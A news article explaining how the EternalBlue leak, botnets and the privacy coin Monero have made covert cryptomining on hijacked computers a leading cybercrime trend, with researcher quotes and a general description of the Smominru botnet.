Miners, Botnets, and Monero Create Perfect Storm for Cryptomining

Miners, Botnets, and Monero Create Perfect Storm for Cryptomining

Several things have come together in a perfect storm to create the most recent crypto-crime trend: the ability to surreptitiously install illicit Monero miners on unsuspecting computers around the world. Windows servers, laptops, Android devices, and IoT connected devices are all at risk.

The worst part? Targets often are unaware that they’ve been hacked — unless they’re able to recognize an occasional performance slowdown or can closely monitor their electric use. No ransoms, no stolen passwords or personal information; victims may even find it difficult to convince anyone there’s a problem.

Perfect Storm
In 2017 a hacker group released a National Security Agency-created hack called EternalBlue, which made it easy to crack into computers running Microsoft Windows.
Cryptomining itself: the fact that blockchain-based systems utilize miners, who automatically receive a cryptocurrency payment/reward for their contribution in whatever coin they choose to process.
Cryptocurrency users looking for more anonymity than offered with Bitcoin developed Monero, an altcoin better able to hide the tracks of criminal transactions.
Under the Radar

Cryptomining is both profitable and easy (enough) to mount. As a result, it is rapidly replacing ransomware as the crypto-related cybercrime of choice, especially as cybersecurity vendors are bringing ransomware protection to market. The combination of the above technologies has created what is essentially a perfect storm, threatening to wreak havoc on computer systems.

“What we’re looking at from a near and potentially long-term perspective is the value of a computer that has just a regular old CPU might be more just leaving it quietly running some cryptocurrency miner rather than infecting it with ransomware or some other software that might steal data,” explains Ryan Olson, Intelligence Director at Palo Alto Networks.

“In this new business model, attackers are no longer penalizing victims for opening an attachment or running a malicious script by taking systems hostage and demanding a ransom,” explain the Talos team. “Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining.”


A large number of compromised devices working together is known as a botnet. Botnets are a common component of a hacker’s toolbox, as they can mount distributed denial of service attacks and various other attacks that require massive amounts of coordinated transaction processing.

In the case of illicit cryptomining, however, each node works independently of the others. Cyber-criminals simply need to install many separate (but connected) miners because each miner only generates a relatively small amount of cryptocurrency.

Case in point: Smominru. Smominru leverages the EternalBlue exploit from the NSA, targeting Windows. The attacker typically mounts a phishing attack with a Microsoft Word file attachment. Once the target downloads the file, it runs a Word macro that executes a Visual Basic script that in turn runs a Microsoft PowerShell script that downloads and installs the miner executable.


One of the main cryptocurrencies that makes this whole process work is the newly-developed anonymous cryptocurrency Monero. “Bitcoin alternatives like Monero and Ethereum continue their overall upward trend in value,” explains Sandiford Oliver, Cybersecurity Researcher for Proofpoint, “Putting them squarely in the crosshairs of threat actors looking for quick profits and anonymous transactions.”

While other cryptocurrencies do have their own roles, Monero is shaping up to be the favorite. “This Monero mining botnet is extremely large, made up mostly of Microsoft Windows servers spread around the globe,” says Kevin Epstein, Vice President of Proofpoint’s Threat Operations Center.

05.03.2018 / 20:10 70
Quebec Electricity Utility Slammed With Requests From Cryptocurrency Miners Quebec Electricity Utility Slammed With
Be careful what you wish for. Hydro-Quebec, Canada’s largest electric utility, which has been courting cryptocurrency companies with its low cost,
Hackers Are Stuffing Monero Ransom Notes Inside DDoS Attacks Hackers Are Stuffing Monero Ransom
Privacy-centric cryptocurrencies like Monero (XMR) are attractive to cybercriminals, who’ll seemingly do anything to get paid. Following a
Bitcoin Cash Gaining Acceptance in Ransomware Community Bitcoin Cash Gaining Acceptance in
Bitcoin Cash has started to gain more acceptance – at least, in the field of ransomware. Fork Over Your Bitcoin… Cash Security researcher
Icelandic Police Are Hunting for Hundreds of Bitcoin Miners Icelandic Police Are Hunting for
The theft of hundreds of cryptocurrency miners in Iceland has led to a series of arrests amid an ongoing investigation. The Associated Press reports
How Hacked Widgets Help Criminals Mine Monero How Hacked Widgets Help Criminals Mine
Covert cryptocurrency mining is shaping up to be the new mainstay of cybercrime. Crooks hack servers, personal computers, and mobile devices and take
Comments (0)
Add a comment
Comment on